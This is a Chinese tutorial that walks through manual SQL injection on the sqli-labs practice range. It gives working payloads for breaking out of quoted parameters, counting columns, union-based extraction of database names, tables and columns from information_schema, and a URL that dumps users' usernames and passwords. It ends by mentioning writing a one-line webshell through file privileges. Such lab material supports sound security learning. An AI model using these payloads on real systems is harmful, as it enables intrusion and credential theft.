手工SQL注入流程 ：

 

 

    1.寻找注入点

功能点

URL注入 一般为get请求

登录框提交  一般为post 请求

搜索栏查询

用户注册

cookie注入:识别用户的唯一标识

主机头：指定请求资源的internet主机和端口号

引用站点头（host)：指定获取当前请求的资源

用户代理头（user-agent)：确定用户使用的web浏览器。

 

 

数据类型

 

 

 

 

 提交方式

 

 

 

2.靶场实战案例

基础的手工注入 SqlLab 1-4

 

第一步: 根据功能,数据类型,提交方式找注入点

 

首先在id=1 后面 尝试使用'来进行分割  并输入 and 1=1 来验证 以及 --+ 来过滤后面的内容

代码如下

Id = 1 ' and 1=1 --+

如果没有成功可以使用 " ) 等来进行分割，#进行过滤

反应正常的话使用 1=2 进行进一步确认注入点

 

 

第二步 使用order by 拆解字段

 

 

 

证明该表只有 3 个字段

 

 

第三步 找回显点

使用union 联合查询注入

http://localhost/sqli-labs-master/Less-1/index.php?id=-1' union select 1,2,3 --+

 

 

 

第四步 可以查看到有两个字段有web回显信息，进一步信息收集

 

http://localhost/sqli-labs-master/Less-1/index.php?id=-1' union select 1,database(),version() --+

 

 

 

拿到数据库的信息

第五步 进行SQL注入

a.找数据库对应的表

 

从 infromation_schema 系统库下面的table 表查取  数据库 security 的所有表名 table_name

 

构造 查询语句 union select 1, group_concat(table_name),3  from  information_schema.tables where table_schema=database()

 

并使用 group_concat 函数 去重分组

 

users表中有账号和密码信息，继续查找字段

 

b.找users表中所有的列

构造 查询语句 union select 1, group_concat(column_name),3  from  information_schema.columns where table_name=0x7573657273

 

c.从列中拿去信息 password username

http://localhost/sqli-labs-master/Less-2/index.php?id=-1%20union%20select%201,%20(select%20group_concat(username,password)%20%20from%20users),3

 

 

 

 

 

 

3.寻找注入点

利用文件的读写权限，可以写入一句话木马，也可以进一步读取隐私信息